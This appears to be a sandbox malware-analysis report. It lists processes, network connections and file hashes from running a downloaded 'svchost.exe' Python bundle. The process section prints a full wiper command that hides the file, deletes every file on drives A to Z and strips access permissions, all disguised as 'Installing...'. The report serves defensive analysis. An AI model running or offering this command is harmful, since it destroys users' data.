"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1

C:\Users\Admin\Downloads\svchost.exe

"C:\Users\Admin\Downloads\svchost.exe"

C:\Users\Admin\Downloads\svchost.exe

"C:\Users\Admin\Downloads\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s svchost.exe

C:\Windows\system32\attrib.exe

attrib +h +s svchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c timeout 1 & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & echo Installing... & del A:\*.* /f /s /q & cacls A:\ /e /p everyone:n & del B:\*.* /f /s /q & cacls B:\ /e /p everyone:n & del D:\*.* /f /s /q & cacls D:\ /e /p everyone:n & del E:\*.* /f /s /q & cacls E:\ /e /p everyone:n & del F:\*.* /f /s /q & cacls F:\ /e /p everyone:n & del G:\*.* /f /s /q & cacls G:\ /e /p everyone:n & del H:\*.* /f /s /q & cacls H:\ /e /p everyone:n & del I:\*.* /f /s /q & cacls I:\ /e /p everyone:n & del J:\*.* /f /s /q & cacls J:\ /e /p everyone:n & del K:\*.* /f /s /q & cacls K:\ /e /p everyone:n & del L:\*.* /f /s /q & cacls L:\ /e /p everyone:n & del M:\*.* /f /s /q & cacls M:\ /e /p everyone:n & del N:\*.* /f /s /q & cacls N:\ /e /p everyone:n & del O:\*.* /f /s /q & cacls O:\ /e /p everyone:n & del P:\*.* /f /s /q & cacls P:\ /e /p everyone:n & del Q:\*.* /f /s /q & cacls Q:\ /e /p everyone:n & del R:\*.* /f /s /q & cacls R:\ /e /p everyone:n & del S:\*.* /f /s /q & cacls S:\ /e /p everyone:n & del T:\*.* /f /s /q & cacls T:\ /e /p everyone:n & del U:\*.* /f /s /q & cacls U:\ /e /p everyone:n & del V:\*.* /f /s /q & cacls V:\ /e /p everyone:n & del W:\*.* /f /s /q & cacls W:\ /e /p everyone:n & del X:\*.* /f /s /q & cacls X:\ /e /p everyone:n & del Y:\*.* /f /s /q & cacls Y:\ /e /p everyone:n & del Z:\*.* /f /s /q & cacls Z:\ /e /p everyone:n & del C:\*.* /f /s /q & cacls C:\ /e /p everyone:n

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\cacls.exe

cacls A:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls B:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls D:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls E:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls F:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls G:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls H:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls I:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls J:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls K:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls L:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls M:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls N:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls O:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls P:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Q:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls R:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls S:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls T:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls U:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls V:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls W:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls X:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Y:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls Z:\ /e /p everyone:n

C:\Windows\system32\cacls.exe

cacls C:\ /e /p everyone:n

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault9eb942a4h4d64h4970h8903h042002736874

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\mmc.exe

"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa38cf855 /state1:0x41c64e6d

C:\Windows\system32\bootim.exe

bootim.exe /startpage:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.217:443 www.bing.com tcp
US 8.8.8.8:53 217.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
BE 88.221.83.217:443 www.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 201.201.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ea98e583ad99df195d29aa066204ab56
SHA1 f89398664af0179641aa0138b337097b617cb2db
SHA256 a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6
SHA512 e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

\??\pipe\LOCAL\crashpad_4044_BKDORYCLJEYWVFHP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4f7152bc5a1a715ef481e37d1c791959
SHA1 c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7
SHA256 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc
SHA512 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ce386fa0a7a99620d2c111a51f2ab86e
SHA1 cc3436b75102314bc13ec3269b348ae7b5af34c5
SHA256 c1303601b4037470644dadeff70d658ea621fbf921fc6f088e7d6fb426a5db69
SHA512 613b1af9526c49b932362ded94a1dbb3ac447e0d8751051225ff3c44635a161168452e0ad356259e793cdb3e5111f20201f2270b4cf899f951acacf6baeab0e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload

MD5 fcd43ec0e853fdc49804259d9e0d1cf8
SHA1 9e31403b4be7b991961fc2c85aeb3b72f1aab23d
SHA256 c914eed114c9b2ee359c2e7d6783d79658c7fa65fbba815e55e94fe945093410
SHA512 a558888493bddd9e0679693bda114965c721d77a7dec2f95673c430ecc6ecb2a56c9ca681bc38977ee37218585551f850bf5e256e4fb29c3a982031b88c69f60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6db38442a5bfa8b66005c05bbf91a8b8
SHA1 90b36503e1e84fa26fc4be217b97b29443586b16
SHA256 e27b579051e47bab51d44f9e0f31458cf2db2975d9715f087a8d94d43386ee9c
SHA512 f76050f4f774ab61028007b24e71b3c77cab6e8ee6970d6ba50ffb8f46d2f0060f0664c3c9ab6827dc436bb03d323b94660b7121f360ea8c3a35da27b6556b15

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 30667c7f4c19b2fc15349e0fc70bb873
SHA1 e0279624eeb8d52a8393408f5727f82a24f28740
SHA256 660f81ee4576587120ce0143959880df34ba0647a2e5815e06226fbcab65224e
SHA512 904b51981cdb98bccdf26f46fb60fdf8d4551dd2e595a06d2e64b7709f3668c8b7916b72715d4020eff73f979f687c445f120403ceeeec62dfd53424828861ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8e5969dd37c99dd2f217b4bba40b7833
SHA1 f121666f41e7537c61e369c4f644d0fdd1353d22
SHA256 c8e5c7b069fc48151e83d4575d02c94bdb8db0a89f55418a26285873c8c56ba0
SHA512 65785cd9c9521c018c3cfaf11e29b877cf0b8faa24ebafd93f7a79d73475a23a651b9871d3a6d1e1316bf05373e60d93fdcc0abeb6f5da5bd1409ffe2e7aead8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 dacd32183385fde2a06a1436740f2976
SHA1 7604d258c57d123e17e4f332dfa1d5b568a93549
SHA256 ac399e16c19c992d1d124b1a155afb28f3327080d316e3634b17e1e8a055dfd9
SHA512 205f73895517968ade7cd847aef1f12bddecced326df8862ac6c9a9ffcc9b43a86f4402fd36beb73dadd51c4e25dbee9b6ac8fde6f101f013c2b9478cdcc9f52

C:\Users\Admin\AppData\Local\Temp\_MEI35562\svchost.exe.manifest

MD5 dee2c6246611adaa4d04b66f179f4a7a
SHA1 9aa4cfdc6179c02a74853f68ca65de53a46eec9d
SHA256 1df11ae29c8f6fe03f840f79625d504bb6895d24621e324fc82ac91e946fd431
SHA512 f51b705f8b875b763c74bc65370198c657b8c74a3716b53d81cad7cc0a892939dabcac332c27db2661c4f7fcf7a6cea478f84906fe2fe1e00240519d297ea76b

C:\Users\Admin\AppData\Local\Temp\_MEI35562\python27.dll

MD5 131244d3741081a1a59c0bb13bf80bc5
SHA1 8b0cd9379d5055c82a4b065caea5f65c67dc003b
SHA256 bfe564310e31cf4eeb1e08f93297a7280e4c3fb4ecf8be2884a1ceab67e05a3f
SHA512 2aa27d36fb6bcc37359aa3dbf3f27ab583d95202ddcbc81e1ddea25b2b3ce2ef6fee701896269404becce2eb0e8e72f171f32b53765177a50774c1d7c392667a

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\win32process.pyd

MD5 1fe1a15be6a20763adfe13ac51aecfbb
SHA1 057a117bbd8f2792e16e877832cf4bc5d1776692
SHA256 4d8aafe841cd3c2d6c31469e47b76956e373ace9f10d9a84c903545fd98f8a9e
SHA512 029e9d2a97ede4024f38a683589112c74c652d131fe78e9e01686a5d9e783a29db4a1970d5c2a5fc61b74c2d76e5f7a2e82056462502297d1f432b710a69cbec

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\pywintypes27.dll

MD5 b7c9705250f63820ad8b47e87e2d15dc
SHA1 723cfd49de3a3cc6c89e4ecb60a19e1997cfcd22
SHA256 94e42f65ea59cdf1398644dc8a18ce6333bed65edc6f1b33b73a4f645fca040f
SHA512 74d67f907b21125e617fb4d23956248496f666e8eb55f23215f57e504b249ae8b30428929137551bebcbf742ab7f5476ab58325941ce89b30af83b5c0af011d2

C:\Users\Admin\AppData\Local\Temp\_MEI35562\win32gui.pyd

MD5 c93ce420e87cfa52f5019caffa8e8428
SHA1 dc8216a9db6923b13dae12a975f43d099984d45a
SHA256 b319167da761967f100668b144ad1f3004bdc760a99a4642b169458f3b586b44
SHA512 65df51dddc6b7efb7b972a5681ca437d870deb3857cb8923d6195adb9a1feb61deeac95ea07d83977e03e79f7d856ba22da9751a071bf95d59d10a6b797e6449

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_socket.pyd

MD5 f9b160a08dacc271b8b7ad1516d88330
SHA1 762698430bbfe5b5d52756b969fe7a757ce07a33
SHA256 7ddf74ac35a6dfa24c4f96acd058829fc934b798af910ed2a58d9b8ef8a26511
SHA512 5f1666a63e1a5a9d788556899d2a1ddeb28a33c4aac9273c706c35fe7ff3feeb0138a2e75e6f9540560f8df5717a9b0e264684f27c13277db632cfccd506aa2a

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_ssl.pyd

MD5 16bbb7e72d190e6712d923dbc854a45f
SHA1 2913c4d3b9f0c708845252e863518d9bdaea5aac
SHA256 a9d0fdc952d5bb1ba7f809a6fa7ba9418414d5a10f4a7d429f680eac22d6a322
SHA512 906f16928e322addf52aad4e21265650b82853ae73e39ec60a80effd205d75bf5b4183bac1cd55f853bbcfdc84c4fb2694acff2098c32d93175aeefd3cdff5c9

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\bz2.pyd

MD5 a1950d15ae7fadd5b203639f3965f690
SHA1 dd09dfee5577feca2ce25d9cc5091933ca580adb
SHA256 baa75ad550784c5c5bada51cb565784a04f267fad708e6611b0cc3dc6ae0c1ed
SHA512 b0ca2e27e0fa77a58c7a56d66bf01fca152cb784e11ced7e247b092864f5a81b6cde353adfe58193d660f9be7b37c8076a6ca75390d4b34228b5359a3a884c88

C:\Users\Admin\AppData\Local\Temp\_MEI35~1\psutil._psutil_windows.pyd

MD5 c455de76dd12b1a015c2639072e40c91
SHA1 271566571a40c4d6d9878e6ff81bd4fd8361f064
SHA256 01e03adf7f034d55b3ed665649cc8d2bb1edc8c2562bd8081c4f1a7087911b19
SHA512 eaee2ffde42e1b1bf505f8767831f87caaded49d20917d65a7553b7e9b2975ccbc8e0d6523f58ba7c25ce92a52f892633fcd062b082d2fe34ea8e46977f0e813

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 21f516584fe90adae377c0de7aa39a1f
SHA1 a17d614c94f564a9f905b493bf2464fdee955064
SHA256 46d07b18e768ba7a9b164d431814ccac955a5eaf5ab406c363ac75aa03b80475
SHA512 e1cbfbbbdbea4dd84a34e9a506e4eff3b4e16546c95f2807999c7ae913623034d6cc78d90ab78009ef0a9312ba82e8f9dbb65780c72e4a26b0689277d7e7a357

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b93382c6d9facdc7d14b443181558841
SHA1 120f90d235ee10d1408b7fe258ed67777136adec
SHA256 6b460b7c0d9bc1c66650aea5a3f5ba0d6841b91b104138f8c49c2c23a296830c
SHA512 8691165b917ed2e48168a0dd501e3cde1560b8e231f944b7c209c42e4a23b1e93f953b4417feb6c95044728d50821c64865f609269a7a0fff7524e147a267b52

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 46fa4f5f7344089589d117bd7599b3a9
SHA1 b6cc1fe19e527d4a372c97e4d195ed94eee40030
SHA256 223280d95a13f1af6af06459bbf230874500c212a2e16f63914eff3f22e8b57a
SHA512 6b680aedde7e806802652aab9ab31cb21438bc8756b063955e6f03bbbdf1273f7d47c40ec1a19fe27537afeb8d6cc219a246d31f7c6822b481649fe296e2a45c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 50f9406be087808527fb38b487f17aeb
SHA1 24869daac58a3d3b5aa84f880a0ca77e3633c432
SHA256 a278e0fa6461cc8384bcff420d5d0c30c77f7ea4ebdc9ce89ac0605d6fd885a8
SHA512 7f22e743e87eb8009f8ac3b57c6b0c457ff8773ba6ba70c1e2ab0105b81898d4366384cdadcc4fd87174b7959c6651964e0c4abf4b9ad2b603f4660ccf5f6c55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser

MD5 a397e5983d4a1619e36143b4d804b870
SHA1 aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4
SHA256 9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4
SHA512 4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

MD5 b550823bb03e4a8b91eaab44d4356f1c
SHA1 49f9661821671a666425725bc55c7672b119d656
SHA256 b250edc7c58b0e89336dd69966073980e4fd0e75964ed24068923493a9998b84
SHA512 44080c5e2d42fc097cfa82e5bc71a410e152a642100966dd1e982f0e2ef46441dfa604853e72aa2e340aca33e1e034d7d190af4d4945aec9b8924d530bffd663

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 87e8df0f08e52101aaa94ca9b9b36c7c
SHA1 edeb60ade91808ac14f210ebe12cd703275a1c77
SHA256 2cbdb2c97fe820e17763c235ac03feca116b815e7832dd354433ec6bec05b830
SHA512 ddef8bf476506dcb3f190576cf016d7fb38f444b8c0eb60ba0f5ac286b2a1a5e0f768cb36b90f47117b717ddab3e8b8a157518b5e5905a71a697eebdc234e23f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 3b3d49f283c5d6ba91570c57d98eb64c
SHA1 5346d2b983e99930006fb49eb4c4bca983e9fd5e
SHA256 998bba686c4e8d14f88b83e41fa81d0523b33dbc0030ede745ac6f969911263b
SHA512 2c58eecfe2728892d925fd37ce5477bba821b656031dd89f5e1e6dbadf6ac00b9b32fd72fa1d972db892d480d784b5fa1bea122f09d8b8224f0d8762ca8ee019

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

MD5 48f07dcf46e403d0e8833ec702b23634
SHA1 56418362cb93dea7cf8b110dca4aecc5963598fd
SHA256 8f809bddc3adaceb6d29b175341ccba7d5ec8a7362e6d6f19ac76e985cbc47ee
SHA512 cf33ec74e8546cc57eea22bbf80369f17d07931f30c72ae43a77709715abd5de481bb0ec371ce14842c387ccebf93e0cf547a1f07032559cce09a5e986ac3d6e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

MD5 a47093402a104de8fd310798888b16b9
SHA1 79007031f2fc6ad99d1bfb3f924c6c29f27a9279
SHA256 5e9b31918fd0382f9b83db9e8aceb700e34bf678b8f6a74c0ab227d8a0a7ca0f
SHA512 48757f5c706f6cace3e6d91ac81b77c7ce96665f9805a79ebcb7b42304225b7c46283e9a9650be53af8c349e8217014733fc753fd1cb70bb74a51d6d0935ebfb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 9a21c78c3cfb129f395919dfb35bd678
SHA1 65e66cd7c7dbae0fa6f5346a1413414bae531d06
SHA256 f336b0f4882f58bcc4ffcea8aeb064c3f2999836ccb269eecc140bb401bbdf23
SHA512 8005c6594dd227e5dcd0e1a9dca2757c1e94ac1ee01f23f01130900f67382b5123b265ecd7f79ec01914ad8d8f743318fa2ba6fa70fa18a5597a9f492ccde04c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 8b2813296f6e3577e9ac2eb518ac437e
SHA1 6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86
SHA256 befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d
SHA512 a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 ec52a780fb628756883539d1daf3f68f
SHA1 cbfa20c69acbb5b75a16c81d12127be1ebcd47ae
SHA256 4db0f4e2991abbcf13c1fa0094672e2b3f453797e271a846a0eb3b4ffd6ebfce
SHA512 5191b287f7d15d882ced2bba912a327c351a29dfc4b457172f3f5886b60eb6d7683c6ca51c9734cc0385da9514d271d674313c049db5b0adec1b05a1a1ca29fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 675c3cc9eeb511d43db6635bf1b515f9
SHA1 b5a3bc916093bf35af9cb26f45f79c229db4d70b
SHA256 827caf07904c9ca524acf5d97bcaf1f11c84ffdb1fc2e7f683e1dc80648ed58c
SHA512 6e82a416ca6d79ed2402382326d8621d9828b420daad5ff0a93f2de13598213b52ed7fc9f6a59dc6bb71bfb6a1bb13be3d54581e2d26ecb0dbf0bb2ecc894197

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 54a5ca74a6d9c531ec2c366edd7be658
SHA1 c4d01c1cfd3c190fd9ac918eb5a3bebaf41b29d6
SHA256 9f3cb2edebc4754956da013e3e4fa9735d5d5cdbd5f02a7c9869a8ada5bf190d
SHA512 b8670bb7a6496e8e6a09dbcb974ace55451be9c937f178803891129bd33f9545119924dffffa84f13dc87a753df0e9d66e104e5df72f9d6911c619c835d78e2d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 8120b74339adf2c06b6fafd4ce8bf1e3
SHA1 f9fff0063c05f035dee5b9e517f4d79ce6e487d5
SHA256 cebcfb07b88ae69974df7a8ffb49b94bffa35f9804bdc97b74be9fc709ea1c73
SHA512 79fe6cadc94fc0e1d037c3e466c9cf67c486bde99f6d62126758c49b41c9891f218d668a5a6fb55882c1cb430bd333156539f52bb4449df43939546aa9c8b378

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

MD5 3dae5c2f86a199c670f1edd911b11fc3
SHA1 f7e9f678edf01cc5d4e933f465745e354090b89f
SHA256 77929e8353b974512a6d3d4b6605640169482acdbf98c9f93bce15d1a4950256
SHA512 10dcc494fc0141ba8de84d198c23c727746bc2731627ee8bc34a74de160d91fa6032b91ab4d0c684841f4b1a3c7499ac8e00bab3a50e851c50b3fd5e83c00215

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

MD5 7d04d599798c564019a0297d7883ac73
SHA1 a833a431e3b14547d5607473a6437dad593a10a7
SHA256 7cf49a0f1cf00f4bbb98716ca71830746159dcd10b337898673d37b0046ee1f3
SHA512 1a6fd3226340d71a339e7276efe6b027a4f6297f91f46bdab650dce14db57d9cc2a68d7ff1ebf90152635c54171eda1874e618f9a8b1620781ae3684896f72e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

MD5 8fe25a7a10e7478946e1c57f634d9592
SHA1 bd03febe0cda8954ff44883f9e9c4807b6c1e50e
SHA256 1d9f946ee50643a2150bb1367ee977b4e010eda40fcc1364e2478db91000f1c8
SHA512 d4ae3a505595046b013f12cf3f64d208c0b9381a35520437a16dfefd46ccd8021b7ce5a9a2b9227fa7edd09f441ab8bf5f42c12d231d65101d3e75828ccfef92

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

MD5 9a0487450d9a8b45793b8cb0e78c87ed
SHA1 dc020b69a67586f085c0751d2d750eaa344c83ff
SHA256 1514d587b20c3c2064c4246cd1cc9e69c2bd0dabc7955ac677733eb75bde167d
SHA512 8255e36e57bc7908444396e5105526e24bee7f97b112b6229ae2687129010f1b138e085d0338f430c0163410d254f3d6239c383e85e9b0b589c3a4148021ecfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

MD5 1e9785d107cb65d717e5d8ade3e1e37d
SHA1 cbc44746e770d2ee53c1205664eef6eec72ab103
SHA256 0831b736e3f9e293a277f84a2204733e46da8c15c9e6ea3ad5b79d5319d9413d
SHA512 ac32263ea2b276802c210df43e97545328da78d7092d7419bc7a321ce25f3fb465df4dc11c1ac2468beac8af356d85f9b78024b24fa6802614095797b329d628

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

MD5 935462e84c85ba3725f3e006eecdfa94
SHA1 1e43d1054ed6a489abf03ddcb0538e677f3b1c6d
SHA256 2c6bbba912cac1d0d4b6c63aaba9f744d026b0089e7952d904755e49de993a2d
